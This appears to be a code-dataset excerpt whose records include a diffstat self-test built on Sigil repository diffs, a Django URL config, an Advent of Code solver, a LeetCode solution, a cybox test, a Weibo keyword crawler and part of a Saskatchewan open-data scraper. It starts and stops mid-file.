= 0; + } + + void QWindowPrivate::init(QScreen *targetScreen) diff --git a/docs/testplugin_v017.zip b/docs/testplugin_v017.zip new file mode 100644 index 00000000..a4cf4c4c Binary files /dev/null and b/docs/testplugin_v017.zip differ diff --git a/ci_scripts/macgddeploy.py b/ci_scripts/gddeploy.py similarity index 73% rename from ci_scripts/macgddeploy.py rename to ci_scripts/gddeploy.py index a512d075..f9dacd33 100644 --- a/ci_scripts/macgddeploy.py +++ b/ci_scripts/gddeploy.py @@ -1,19 +1,32 @@ #!/usr/bin/env python3 import os +import sys import subprocess import datetime import shutil +import glob gparent = os.path.expandvars('$GDRIVE_DIR') grefresh_token = os.path.expandvars('$GDRIVE_REFRESH_TOKEN') -travis_branch = os.path.expandvars('$TRAVIS_BRANCH') -travis_commit = os.path.expandvars('$TRAVIS_COMMIT') -travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') +if sys.platform.lower().startswith('darwin'): + travis_branch = os.path.expandvars('$TRAVIS_BRANCH') + travis_commit = os.path.expandvars('$TRAVIS_COMMIT') + travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') + + origfilename = './bin/Sigil.tar.xz' + newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_numbe\ r) +else: + appveyor_branch = os.path.expandvars('$APPVEYOR_REPO_BRANCH') + appveyor_commit = os.path.expandvars('$APPVEYOR_REPO_COMMIT') + appveyor_build_number = os.path.expandvars('$APPVEYOR_BUILD_NUMBER') + names = glob.glob('.\\installer\\Sigil-*-Setup.exe') + if not names: + exit(1) + origfilename = names[0] + newfilename = '.\\installer\\Sigil-{}-{}-build_num-{}-Setup.exe'.format(appveyor_branch, appveyor_commit[:7], ap\ pveyor_build_number) -origfilename = './bin/Sigil.tar.xz' -newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_number) shutil.copy2(origfilename, newfilename) folder_name = datetime.date.today() diff --git a/docs/qt512.6_backport_009abcd_fix.patch b/docs/qt512.6_backport_009abcd_fix.patch deleted file mode 100644 index f4724347..00000000 --- a/docs/qt512.6_backport_009abcd_fix.patch +++ /dev/null @@ -1,26 +0,0 @@ ---- qtbase/src/widgets/kernel/qwidget.cpp.orig 2019-11-08 10:57:07.000000000 -0500 -+++ qtbase/src/widgets/kernel/qwidget.cpp 2019-12-11 12:32:24.000000000 -0500 -@@ -8934,6 +8934,23 @@ - } - } - switch (event->type()) { -+ case QEvent::PlatformSurface: { -+ // Sync up QWidget's view of whether or not the widget has been created -+ switch (static_cast<QPlatformSurfaceEvent*>(event)->surfaceEventType()) { -+ case QPlatformSurfaceEvent::SurfaceCreated: -+ if (!testAttribute(Qt::WA_WState_Created)) -+ create(); -+ break; -+ case QPlatformSurfaceEvent::SurfaceAboutToBeDestroyed: -+ if (testAttribute(Qt::WA_WState_Created)) { -+ // Child windows have already been destroyed by QWindow, -+ // so we skip them here. -+ destroy(false, false); -+ } -+ break; -+ } -+ break; -+ } - case QEvent::MouseMove: - mouseMoveEvent((QMouseEvent*)event); - break; diff --git a/docs/Building_Sigil_On_MacOSX.txt b/docs/Building_Sigil_On_MacOSX.txt index 3b41fd80..64914c78 100644 --- a/docs/Building_Sigil_On_MacOSX.txt +++ b/docs/Building_Sigil_On_MacOSX.txt @@ -113,7 +113,7 @@ install_name_tool -add_rpath @loader_path/../../Frameworks ./bin/Sigil.app/Content # To test if the newly bundled python 3 version of Sigil is working properly ypou can do the following: -1. download testplugin_v014.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs +1. download testplugin_v017.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs 2. open Sigil.app to the normal nearly blank template epub it generates when opened 3. use Plugins->Manage Plugins menu and make sure the "Use Bundled Python" checkbox is checked 4. use the "Add Plugin" button to navigate to and add testplugin.zip and then hit "Okay" to exit the Manage Plugins Dialog """ # noqa: E501 W293 testoutput = b""" docs/qt512.7_remove_bad_workaround.patch | 15 ++++++++++++ docs/testplugin_v017.zip | Bin ci_scripts/macgddeploy.py => ci_scripts/gddeploy.py | 0 docs/qt512.6_backport_009abcd_fix.patch | 26 --------------------- docs/Building_Sigil_On_MacOSX.txt | 2 +- 5 files changed, 16 insertions(+), 27 deletions(-)""" # noqa: W291 # return 0 on success otherwise return -1 result = diffstat(selftest.split(b'\n')) if result == testoutput: print("self test passed") return 0 print("self test failed") print("Received:") print(result.decode('utf-8')) print("Expected:") print(testoutput.decode('utf-8')) return -1 if __name__ == '__main__': sys.exit(main())
en
0.587035
#!/usr/bin/env python # -*- coding: utf-8 -*- # vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab # Copyright (c) 2020 <NAME>, Stratford Ontario Canada # All rights reserved. # # This diffstat code was extracted and heavily modified from: # # https://github.com/techtonik/python-patch # Under the following license: # # Patch utility to apply unified diffs # Brute-force line-by-line non-recursive parsing # # Copyright (c) 2008-2016 <NAME> # Available under the terms of MIT license # # and falls under the exact same MIT license # only needs to detect git style diffs as this is for # use with dulwich # emulate original full Patch class by just extracting # filename and minimal chunk added/deleted information to # properly interface with diffstat routine An internal routine to parse a git style diff or patch to generate diff stats Args: lines: list of byte strings "lines" from the diff to be parsed Returns: A tuple (names, nametypes, counts) of three lists: names = list of repo relative file paths nametypes - list of booolean values indicating if file is binary (True means binary file) counts = list of tuples of (added, deleted) counts for that file # handle end of input # note must all done using bytes not string because on linux filenames # may not be encodable even to utf-8 Generate summary statistics from a git style diff ala (git diff tag1 tag2 --stat) Args: lines: list of byte string "lines" from the diff to be parsed max_width: maximum line length for generating the summary statistics (default 80) Returns: A byte string that lists the changed files with change counts and histogram # max changes for any file used for histogram width calc # stats column width # %-19s | %-4d %s # note b'%d' % namelen is not supported until Python 3.5 # To convert an int to a format width specifier for byte # strings use str(namelen).encode('ascii') # -- calculating histogram -- # make sure every entry that had actual insertions gets # at least one + # make sure every entry that had actual deletions gets # at least one - # allow diffstat.py to also be used from the comand line # if no path argument to a diff file is passed in, run # a self test. The test case includes tricky things like # a diff of diff, binary files, renames with futher changes # added files and removed files. # All extracted from Sigil-Ebook/Sigil's github repo with # full permission to use under this license. diff --git a/docs/qt512.7_remove_bad_workaround.patch b/docs/qt512.7_remove_bad_workaround.patch new file mode 100644 index 00000000..64e34192 --- /dev/null +++ b/docs/qt512.7_remove_bad_workaround.patch @@ -0,0 +1,15 @@ +--- qtbase/src/gui/kernel/qwindow.cpp.orig 2019-12-12 09:15:59.000000000 -0500 ++++ qtbase/src/gui/kernel/qwindow.cpp 2020-01-10 10:36:53.000000000 -0500 +@@ -218,12 +218,6 @@ + QGuiApplicationPrivate::window_list.removeAll(this); + if (!QGuiApplicationPrivate::is_app_closing) + QGuiApplicationPrivate::instance()->modalWindowList.removeOne(this); +- +- // focus_window is normally cleared in destroy(), but the window may in +- // some cases end up becoming the focus window again. Clear it again +- // here as a workaround. See QTBUG-75326. +- if (QGuiApplicationPrivate::focus_window == this) +- QGuiApplicationPrivate::focus_window = 0; + } + + void QWindowPrivate::init(QScreen *targetScreen) diff --git a/docs/testplugin_v017.zip b/docs/testplugin_v017.zip new file mode 100644 index 00000000..a4cf4c4c Binary files /dev/null and b/docs/testplugin_v017.zip differ diff --git a/ci_scripts/macgddeploy.py b/ci_scripts/gddeploy.py similarity index 73% rename from ci_scripts/macgddeploy.py rename to ci_scripts/gddeploy.py index a512d075..f9dacd33 100644 --- a/ci_scripts/macgddeploy.py +++ b/ci_scripts/gddeploy.py @@ -1,19 +1,32 @@ #!/usr/bin/env python3 import os +import sys import subprocess import datetime import shutil +import glob gparent = os.path.expandvars('$GDRIVE_DIR') grefresh_token = os.path.expandvars('$GDRIVE_REFRESH_TOKEN') -travis_branch = os.path.expandvars('$TRAVIS_BRANCH') -travis_commit = os.path.expandvars('$TRAVIS_COMMIT') -travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') +if sys.platform.lower().startswith('darwin'): + travis_branch = os.path.expandvars('$TRAVIS_BRANCH') + travis_commit = os.path.expandvars('$TRAVIS_COMMIT') + travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') + + origfilename = './bin/Sigil.tar.xz' + newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_numbe\ r) +else: + appveyor_branch = os.path.expandvars('$APPVEYOR_REPO_BRANCH') + appveyor_commit = os.path.expandvars('$APPVEYOR_REPO_COMMIT') + appveyor_build_number = os.path.expandvars('$APPVEYOR_BUILD_NUMBER') + names = glob.glob('.\\installer\\Sigil-*-Setup.exe') + if not names: + exit(1) + origfilename = names[0] + newfilename = '.\\installer\\Sigil-{}-{}-build_num-{}-Setup.exe'.format(appveyor_branch, appveyor_commit[:7], ap\ pveyor_build_number) -origfilename = './bin/Sigil.tar.xz' -newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_number) shutil.copy2(origfilename, newfilename) folder_name = datetime.date.today() diff --git a/docs/qt512.6_backport_009abcd_fix.patch b/docs/qt512.6_backport_009abcd_fix.patch deleted file mode 100644 index f4724347..00000000 --- a/docs/qt512.6_backport_009abcd_fix.patch +++ /dev/null @@ -1,26 +0,0 @@ ---- qtbase/src/widgets/kernel/qwidget.cpp.orig 2019-11-08 10:57:07.000000000 -0500 -+++ qtbase/src/widgets/kernel/qwidget.cpp 2019-12-11 12:32:24.000000000 -0500 -@@ -8934,6 +8934,23 @@ - } - } - switch (event->type()) { -+ case QEvent::PlatformSurface: { -+ // Sync up QWidget's view of whether or not the widget has been created -+ switch (static_cast<QPlatformSurfaceEvent*>(event)->surfaceEventType()) { -+ case QPlatformSurfaceEvent::SurfaceCreated: -+ if (!testAttribute(Qt::WA_WState_Created)) -+ create(); -+ break; -+ case QPlatformSurfaceEvent::SurfaceAboutToBeDestroyed: -+ if (testAttribute(Qt::WA_WState_Created)) { -+ // Child windows have already been destroyed by QWindow, -+ // so we skip them here. -+ destroy(false, false); -+ } -+ break; -+ } -+ break; -+ } - case QEvent::MouseMove: - mouseMoveEvent((QMouseEvent*)event); - break; diff --git a/docs/Building_Sigil_On_MacOSX.txt b/docs/Building_Sigil_On_MacOSX.txt index 3b41fd80..64914c78 100644 --- a/docs/Building_Sigil_On_MacOSX.txt +++ b/docs/Building_Sigil_On_MacOSX.txt @@ -113,7 +113,7 @@ install_name_tool -add_rpath @loader_path/../../Frameworks ./bin/Sigil.app/Content # To test if the newly bundled python 3 version of Sigil is working properly ypou can do the following: -1. download testplugin_v014.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs +1. download testplugin_v017.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs 2. open Sigil.app to the normal nearly blank template epub it generates when opened 3. use Plugins->Manage Plugins menu and make sure the "Use Bundled Python" checkbox is checked 4. use the "Add Plugin" button to navigate to and add testplugin.zip and then hit "Okay" to exit the Manage Plugins Dialog # noqa: E501 W293 docs/qt512.7_remove_bad_workaround.patch | 15 ++++++++++++ docs/testplugin_v017.zip | Bin ci_scripts/macgddeploy.py => ci_scripts/gddeploy.py | 0 docs/qt512.6_backport_009abcd_fix.patch | 26 --------------------- docs/Building_Sigil_On_MacOSX.txt | 2 +- 5 files changed, 16 insertions(+), 27 deletions(-) # noqa: W291 # return 0 on success otherwise return -1
2.22
2
mva_demo/cms/urls.py
dieterplex/cookiebutter-django-demo
0
6628992
from django.urls import path from .views import ( song_all, song_detail, category_list, like_song, unlike_song ) app_name = 'cms' urlpatterns = [ path('', song_all, name='song_all'), path('<slug:slug>', song_detail, name='song_detail'), path('category/<slug:category_slug>/', category_list, name='category_list'), path('like/<slug:slug>/', like_song, name="like_song"), path('unlike/<slug:slug>/', unlike_song, name="unlike_song") ]
from django.urls import path from .views import ( song_all, song_detail, category_list, like_song, unlike_song ) app_name = 'cms' urlpatterns = [ path('', song_all, name='song_all'), path('<slug:slug>', song_detail, name='song_detail'), path('category/<slug:category_slug>/', category_list, name='category_list'), path('like/<slug:slug>/', like_song, name="like_song"), path('unlike/<slug:slug>/', unlike_song, name="unlike_song") ]
none
1
1.854293
2
src/nexus_streamer/data_source.py
ess-dmsc/nexus-streamer-python
0
6628993
<filename>src/nexus_streamer/data_source.py from typing import Union from .event_data_source import EventDataSource, FakeEventDataSource from .log_data_source import LogDataSource from .isis_data_source import IsisDataSource DataSource = Union[LogDataSource, EventDataSource, FakeEventDataSource, IsisDataSource]
<filename>src/nexus_streamer/data_source.py from typing import Union from .event_data_source import EventDataSource, FakeEventDataSource from .log_data_source import LogDataSource from .isis_data_source import IsisDataSource DataSource = Union[LogDataSource, EventDataSource, FakeEventDataSource, IsisDataSource]
none
1
1.260138
1
2019/day20/solutions.py
ivobatkovic/advent-of-code
3
6628994
<reponame>ivobatkovic/advent-of-code<gh_stars>1-10 from os.path import dirname from os.path import realpath from os.path import join import time import pytest import sys sys.path.append(join(dirname(realpath(__file__)), *[".."])) from day20.donut import Donut def part1(input_): donut = Donut(input_) return donut.shortest_path() def part2(input_): donut = Donut(input_) return donut.shortest_path(True) def main(): # Open data file and read through all lines file_location = "data/input.txt" try: dir_path = dirname(realpath(__file__)) with open(join(dir_path, file_location), "r") as f: input_ = f.read() t0 = time.time() sol_part1 = part1(input_) time_end = round((time.time() - t0) * 1e3) print( "Solution to part one: %s (time taken %s[ms])" % (sol_part1, time_end) ) t0 = time.time() sol_part2 = part2(input_) time_end = round((time.time() - t0) * 1e3) print( "Solution to part two: %s (time taken %s[ms])" % (sol_part2, time_end) ) except IOError: print("Cannot find file at: " + file_location) if __name__ == "__main__": main() @pytest.mark.parametrize( "input1,steps1", [ ("data/test_input0.txt", 23), ("data/test_input1.txt", 58), ], ) def test_step1(input1, steps1): dir_path = dirname(realpath(__file__)) with open(join(dir_path, input1), "r") as f: input_ = f.read() assert part1(input_) == steps1 @pytest.mark.parametrize( "input2,steps2", [ ("data/test_input0.txt", 26), ("data/test_input2.txt", 396), ], ) def test_step2(input2, steps2): dir_path = dirname(realpath(__file__)) with open(join(dir_path, input2), "r") as f: input_ = f.read() assert part2(input_) == steps2
from os.path import dirname from os.path import realpath from os.path import join import time import pytest import sys sys.path.append(join(dirname(realpath(__file__)), *[".."])) from day20.donut import Donut def part1(input_): donut = Donut(input_) return donut.shortest_path() def part2(input_): donut = Donut(input_) return donut.shortest_path(True) def main(): # Open data file and read through all lines file_location = "data/input.txt" try: dir_path = dirname(realpath(__file__)) with open(join(dir_path, file_location), "r") as f: input_ = f.read() t0 = time.time() sol_part1 = part1(input_) time_end = round((time.time() - t0) * 1e3) print( "Solution to part one: %s (time taken %s[ms])" % (sol_part1, time_end) ) t0 = time.time() sol_part2 = part2(input_) time_end = round((time.time() - t0) * 1e3) print( "Solution to part two: %s (time taken %s[ms])" % (sol_part2, time_end) ) except IOError: print("Cannot find file at: " + file_location) if __name__ == "__main__": main() @pytest.mark.parametrize( "input1,steps1", [ ("data/test_input0.txt", 23), ("data/test_input1.txt", 58), ], ) def test_step1(input1, steps1): dir_path = dirname(realpath(__file__)) with open(join(dir_path, input1), "r") as f: input_ = f.read() assert part1(input_) == steps1 @pytest.mark.parametrize( "input2,steps2", [ ("data/test_input0.txt", 26), ("data/test_input2.txt", 396), ], ) def test_step2(input2, steps2): dir_path = dirname(realpath(__file__)) with open(join(dir_path, input2), "r") as f: input_ = f.read() assert part2(input_) == steps2
en
0.956298
# Open data file and read through all lines
2.608625
3
191.number of 1 bits.py
zhuxiangxiao/leetcode
0
6628995
<filename>191.number of 1 bits.py class Solution(object): def hammingWeight(self, n): """ :type n: int :rtype: int """ return len(str(bin(n)).split('1'))-1 def hammingWeightSolution2(self, n): """ :type n: int :rtype: int """ ans=0 while n: ans+=n%2 n /= 2 return ans def stringToInt(input): return int(input) def intToString(input): if input is None: input = 0 return str(input) def main(): import sys def readlines(): for line in sys.stdin: yield line.strip('\n') lines = readlines() while True: try: line = lines.next() n = stringToInt(line) ret = Solution().hammingWeight(n) out = intToString(ret) print out except StopIteration: break if __name__ == '__main__': main()
<filename>191.number of 1 bits.py class Solution(object): def hammingWeight(self, n): """ :type n: int :rtype: int """ return len(str(bin(n)).split('1'))-1 def hammingWeightSolution2(self, n): """ :type n: int :rtype: int """ ans=0 while n: ans+=n%2 n /= 2 return ans def stringToInt(input): return int(input) def intToString(input): if input is None: input = 0 return str(input) def main(): import sys def readlines(): for line in sys.stdin: yield line.strip('\n') lines = readlines() while True: try: line = lines.next() n = stringToInt(line) ret = Solution().hammingWeight(n) out = intToString(ret) print out except StopIteration: break if __name__ == '__main__': main()
en
0.260107
:type n: int :rtype: int :type n: int :rtype: int
3.659936
4
cybox/test/objects/win_filemapping_test.py
Mattlk13/python-cybox
40
6628996
# Copyright (c) 2017, The MITRE Corporation. All rights reserved. # See LICENSE.txt for complete terms. import unittest from mixbox.vendor.six import u from cybox.compat import long from cybox.objects.win_filemapping_object import WinFilemapping from cybox.test.objects import ObjectTestCase class TestWinFilemapping(ObjectTestCase, unittest.TestCase): object_type = "WindowsFilemappingObjectType" klass = WinFilemapping _full_dict = { 'handle': { 'id': 1234, 'name': u("MyHandle"), 'type': u("Window"), 'object_address': long(0xdeadbeef), 'access_mask': long(0x70000000), 'pointer_count': long(3), 'xsi:type': "WindowsHandleObjectType", }, 'file_handle': { 'id': 5678, 'name': u("MyHandle2"), 'type': u("Window"), 'object_address': long(0xbeadbeef), 'access_mask': long(0x90009000), 'pointer_count': long(9), 'xsi:type': "WindowsHandleObjectType", }, 'security_attributes': u("Attributes go here"), 'name': "A mapping name", 'maximum_size': 1000, 'actual_size': 250, 'page_protection_value': "a protection value", 'page_protection_attribute': [ "a protection attribute", "another attribute" ], 'xsi:type': object_type } if __name__ == "__main__": unittest.main()
# Copyright (c) 2017, The MITRE Corporation. All rights reserved. # See LICENSE.txt for complete terms. import unittest from mixbox.vendor.six import u from cybox.compat import long from cybox.objects.win_filemapping_object import WinFilemapping from cybox.test.objects import ObjectTestCase class TestWinFilemapping(ObjectTestCase, unittest.TestCase): object_type = "WindowsFilemappingObjectType" klass = WinFilemapping _full_dict = { 'handle': { 'id': 1234, 'name': u("MyHandle"), 'type': u("Window"), 'object_address': long(0xdeadbeef), 'access_mask': long(0x70000000), 'pointer_count': long(3), 'xsi:type': "WindowsHandleObjectType", }, 'file_handle': { 'id': 5678, 'name': u("MyHandle2"), 'type': u("Window"), 'object_address': long(0xbeadbeef), 'access_mask': long(0x90009000), 'pointer_count': long(9), 'xsi:type': "WindowsHandleObjectType", }, 'security_attributes': u("Attributes go here"), 'name': "A mapping name", 'maximum_size': 1000, 'actual_size': 250, 'page_protection_value': "a protection value", 'page_protection_attribute': [ "a protection attribute", "another attribute" ], 'xsi:type': object_type } if __name__ == "__main__": unittest.main()
en
0.854889
# Copyright (c) 2017, The MITRE Corporation. All rights reserved. # See LICENSE.txt for complete terms.
1.997469
2
tasks/search.py
Lifeistrange/WeiboSpider
1
6628997
# coding:utf-8 from urllib import parse as url_parse from logger.log import crawler from tasks.workers import app from page_get.basic import get_page from config.conf import get_max_search_page from page_parse import search as parse_search from db.search_words import get_search_keywords from db.keywords_wbdata import insert_keyword_wbid from db.wb_data import insert_weibo_data, get_wb_by_mid # 只抓取原创微博,默认是按照时间进行排序,如果只抓首页,那么就不需要登录 url = 'http://s.weibo.com/weibo/{}&scope=ori&suball=1&page={}' limit = get_max_search_page() + 1 @app.task(ignore_result=True) def search_keyword(keyword, keyword_id): cur_page = 1 encode_keyword = url_parse.quote(keyword) while cur_page < limit: cur_url = url.format(encode_keyword, cur_page) search_page = get_page(cur_url) if not search_page: crawler.warning('本次并没获取到关键词{}的相关微博,该页面源码是{}'.format(keyword, search_page)) return search_list = parse_search.get_search_info(search_page) # 先判断数据库里是否存在相关的微博,如果是已有的,那就说明是已经抓取的微博(因为结果默认按时间排序),就退出循环 for wb_data in search_list: rs = get_wb_by_mid(wb_data.weibo_id) if rs: crawler.info('关键词{}本次搜索更新的微博已经获取完成'.format(keyword)) return else: insert_weibo_data(wb_data) insert_keyword_wbid(keyword_id, wb_data.weibo_id) # 这里暂时使用网络调用而非本地调用,权衡两种方法的好处 app.send_task('tasks.user.crawl_person_infos', args=(wb_data.uid,), queue='user_crawler', routing_key='for_user_info') # 判断是否包含下一页 if 'page next S_txt1 S_line1' in search_page: cur_page += 1 else: crawler.info('关键词{}搜索完成'.format(keyword)) return @app.task(ignore_result=True) def excute_search_task(): keywords = get_search_keywords() for each in keywords: app.send_task('tasks.search.search_keyword', args=(each[0], each[1]), queue='search_crawler', routing_key='for_search_info')
# coding:utf-8 from urllib import parse as url_parse from logger.log import crawler from tasks.workers import app from page_get.basic import get_page from config.conf import get_max_search_page from page_parse import search as parse_search from db.search_words import get_search_keywords from db.keywords_wbdata import insert_keyword_wbid from db.wb_data import insert_weibo_data, get_wb_by_mid # 只抓取原创微博,默认是按照时间进行排序,如果只抓首页,那么就不需要登录 url = 'http://s.weibo.com/weibo/{}&scope=ori&suball=1&page={}' limit = get_max_search_page() + 1 @app.task(ignore_result=True) def search_keyword(keyword, keyword_id): cur_page = 1 encode_keyword = url_parse.quote(keyword) while cur_page < limit: cur_url = url.format(encode_keyword, cur_page) search_page = get_page(cur_url) if not search_page: crawler.warning('本次并没获取到关键词{}的相关微博,该页面源码是{}'.format(keyword, search_page)) return search_list = parse_search.get_search_info(search_page) # 先判断数据库里是否存在相关的微博,如果是已有的,那就说明是已经抓取的微博(因为结果默认按时间排序),就退出循环 for wb_data in search_list: rs = get_wb_by_mid(wb_data.weibo_id) if rs: crawler.info('关键词{}本次搜索更新的微博已经获取完成'.format(keyword)) return else: insert_weibo_data(wb_data) insert_keyword_wbid(keyword_id, wb_data.weibo_id) # 这里暂时使用网络调用而非本地调用,权衡两种方法的好处 app.send_task('tasks.user.crawl_person_infos', args=(wb_data.uid,), queue='user_crawler', routing_key='for_user_info') # 判断是否包含下一页 if 'page next S_txt1 S_line1' in search_page: cur_page += 1 else: crawler.info('关键词{}搜索完成'.format(keyword)) return @app.task(ignore_result=True) def excute_search_task(): keywords = get_search_keywords() for each in keywords: app.send_task('tasks.search.search_keyword', args=(each[0], each[1]), queue='search_crawler', routing_key='for_search_info')
zh
0.989169
# coding:utf-8 # 只抓取原创微博,默认是按照时间进行排序,如果只抓首页,那么就不需要登录 # 先判断数据库里是否存在相关的微博,如果是已有的,那就说明是已经抓取的微博(因为结果默认按时间排序),就退出循环 # 这里暂时使用网络调用而非本地调用,权衡两种方法的好处 # 判断是否包含下一页
2.545891
3
scripts/PT_WebExtractor_v2_0/scripts/obsolete/SK_Other_extractor.py
Dan-Eli/FGP_Docs
0
6628998
<filename>scripts/PT_WebExtractor_v2_0/scripts/obsolete/SK_Other_extractor.py import os import sys import urllib2 from bs4 import BeautifulSoup, Comment import collections import math import csv import re import numpy as np import json import urlparse import argparse import traceback import datetime import time import codecs from operator import itemgetter from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.common.exceptions import TimeoutException from selenium.webdriver.firefox.options import Options # Get the shared.py script_file = os.path.abspath(__file__) script_folder = os.path.dirname(script_file) province_folder = os.path.dirname(script_folder) home_folder = os.path.dirname(province_folder) script_folder = home_folder + "\\scripts" sys.path.append(script_folder) import shared import access_rest as rest province = 'Saskatchewan' work_folder = 'H:\\GIS_Data\\Work\\NRCan\\FGP\\TA001\\_%s' % province site_list = collections.OrderedDict([ ('ducks', ('extract_ducks()', 'http://maps.ducks.ca/arcgis/rest/services')), ('commview', ('extract_commview()', 'http://www.communityview.ca/Catalogue'))]) def extract_commview(): commview_url = site_list['commview'][1] soup = shared.soup_it_up(commview_url) # Create CSV file csv_fn = "CommunityView_results" field_names = ['Title', 'Available Formats', 'Map URL', 'Data URL'] my_csv = shared.MyCSV(csv_fn, commview_url, province, field_names) my_csv.open_csv() # Get a list of all the anchors in the treeview at the side of the page ul = soup.find('ul', attrs={'class': 'treeview'}) anchors = ul.find_all('a', attrs={'class': 'TreeRootStandard'}) for anchor in anchors: browse_url = urlparse.urljoin(commview_url, anchor['href']) #print browse_url # Load the sub result sub_soup = shared.soup_it_up(browse_url) # Determine the number of pages in the search page_count = shared.get_page_count(sub_soup, 'pager', 'a') for page in range(0, page_count): # Load the current page if page > 0: page_url = "%s?page=%s" % (browse_url, page + 1) sub_soup = shared.soup_it_up(page_url) # Get the resource list resources_div = sub_soup.find('div', attrs={'class': 'ResourceList'}) resources = sub_soup.find_all('table', attrs={'class': 'ResourceTable'}) for res in resources: map_res = res.find('img', attrs={'alt': 'Map'}) # Get the ID of the resource parent = res.parent id = parent['id'].replace("ResourceTable", "") # Get the name of the resource name = res.find('a', attrs={'class': "ResourceTitle"}).text if map_res is not None: # If the resource contains a map link, it will be included in the inventory rec_dict = collections.OrderedDict((k, "") for k in field_names) # Get the URLs for the data map_url = urlparse.urljoin(commview_url, map_res.parent['href']) data_url = map_url.replace("Map", "Data") #['Title', 'Available Formats', 'Map URL', 'Data URL'] rec_dict['Title'] = name rec_dict['Available Formats'] = "XLS" rec_dict['Map URL'] = map_url rec_dict['Data URL'] = data_url my_csv.write_dataset(rec_dict) my_csv.close_csv() def extract_ducks(): ducks_url = site_list['ducks'][1] my_rest = rest.MyREST(ducks_url) services = my_rest.get_services() # Create CSV file csv_fn = "Ducks_results" field_names = ['Title', 'Type', 'Description', 'URL'] my_csv = shared.MyCSV(csv_fn, ducks_url, province, field_names) my_csv.open_csv() for service in services: if service['name'].find("SK") > -1: rec_dict = collections.OrderedDict((k, "") for k in field_names) #print service rec_dict['Title'] = service['name'] rec_dict['Type'] = service['type'] rec_dict['Description'] = shared.edit_description(service['serviceDescription']) rec_dict['URL'] = service['url'] my_csv.write_dataset(rec_dict) my_csv.close_csv() def main(): #city_list = ['Winnipeg', 'Brandon'] parser = argparse.ArgumentParser() parser.add_argument("-t", "--tool", help="The tool to use: %s or all" % ', '.join(site_list.keys())) #parser.add_argument("-w", "--word", help="The key word(s) to search for.") #parser.add_argument("-f", "--format", help="The format(s) to search for.") #parser.add_argument("-a", "--category", help="The category to search for.") #parser.add_argument("-d", "--downloadable", help="Determines wheter to get only downloadable datasets.") #parser.add_argument("-l", "--html", help="The HTML file to scrape (only for OpenData website).") parser.add_argument("-s", "--silent", action='store_true', help="If used, no extra parameters will be queried.") args = parser.parse_args() #print args.echo #print "province: " + str(args.province) #print "format: " + str(args.format) tool = args.tool #word = args.word #formats = args.format #html = args.html silent = args.silent #cat = args.category #downloadable = args.downloadable if tool is None: answer = raw_input("Please enter the site you would like to extract (%s): " % ', '.join(site_list.keys())) if not answer == "": tool = answer.lower() else: print "\nERROR: Please specify a site." print "Exiting process." sys.exit(1) # if word is None and not silent: # answer = raw_input("Please enter the word you would like to search: ") # if not answer == "": # word = answer.lower() # if cat is None and not silent: # answer = raw_input("Please enter the category you would like to search: ") # if not answer == "": # cat = answer.lower() if tool == "all": for key, site in site_list.items(): eval(site_list[key][0]) else: if tool in site_list.keys(): eval(site_list[tool][0]) else: print "\nERROR: Invalid tool '%s'. Please enter one of the following: %s" % (tool, ', '.join(site_list.keys())) print "Exiting process." sys.exit(1) #geoportal_list = extract_geoportal(province) if __name__ == '__main__': sys.exit(main())
<filename>scripts/PT_WebExtractor_v2_0/scripts/obsolete/SK_Other_extractor.py import os import sys import urllib2 from bs4 import BeautifulSoup, Comment import collections import math import csv import re import numpy as np import json import urlparse import argparse import traceback import datetime import time import codecs from operator import itemgetter from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.common.exceptions import TimeoutException from selenium.webdriver.firefox.options import Options # Get the shared.py script_file = os.path.abspath(__file__) script_folder = os.path.dirname(script_file) province_folder = os.path.dirname(script_folder) home_folder = os.path.dirname(province_folder) script_folder = home_folder + "\\scripts" sys.path.append(script_folder) import shared import access_rest as rest province = 'Saskatchewan' work_folder = 'H:\\GIS_Data\\Work\\NRCan\\FGP\\TA001\\_%s' % province site_list = collections.OrderedDict([ ('ducks', ('extract_ducks()', 'http://maps.ducks.ca/arcgis/rest/services')), ('commview', ('extract_commview()', 'http://www.communityview.ca/Catalogue'))]) def extract_commview(): commview_url = site_list['commview'][1] soup = shared.soup_it_up(commview_url) # Create CSV file csv_fn = "CommunityView_results" field_names = ['Title', 'Available Formats', 'Map URL', 'Data URL'] my_csv = shared.MyCSV(csv_fn, commview_url, province, field_names) my_csv.open_csv() # Get a list of all the anchors in the treeview at the side of the page ul = soup.find('ul', attrs={'class': 'treeview'}) anchors = ul.find_all('a', attrs={'class': 'TreeRootStandard'}) for anchor in anchors: browse_url = urlparse.urljoin(commview_url, anchor['href']) #print browse_url # Load the sub result sub_soup = shared.soup_it_up(browse_url) # Determine the number of pages in the search page_count = shared.get_page_count(sub_soup, 'pager', 'a') for page in range(0, page_count): # Load the current page if page > 0: page_url = "%s?page=%s" % (browse_url, page + 1) sub_soup = shared.soup_it_up(page_url) # Get the resource list resources_div = sub_soup.find('div', attrs={'class': 'ResourceList'}) resources = sub_soup.find_all('table', attrs={'class': 'ResourceTable'}) for res in resources: map_res = res.find('img', attrs={'alt': 'Map'}) # Get the ID of the resource parent = res.parent id = parent['id'].replace("ResourceTable", "") # Get the name of the resource name = res.find('a', attrs={'class': "ResourceTitle"}).text if map_res is not None: # If the resource contains a map link, it will be included in the inventory rec_dict = collections.OrderedDict((k, "") for k in field_names) # Get the URLs for the data map_url = urlparse.urljoin(commview_url, map_res.parent['href']) data_url = map_url.replace("Map", "Data") #['Title', 'Available Formats', 'Map URL', 'Data URL'] rec_dict['Title'] = name 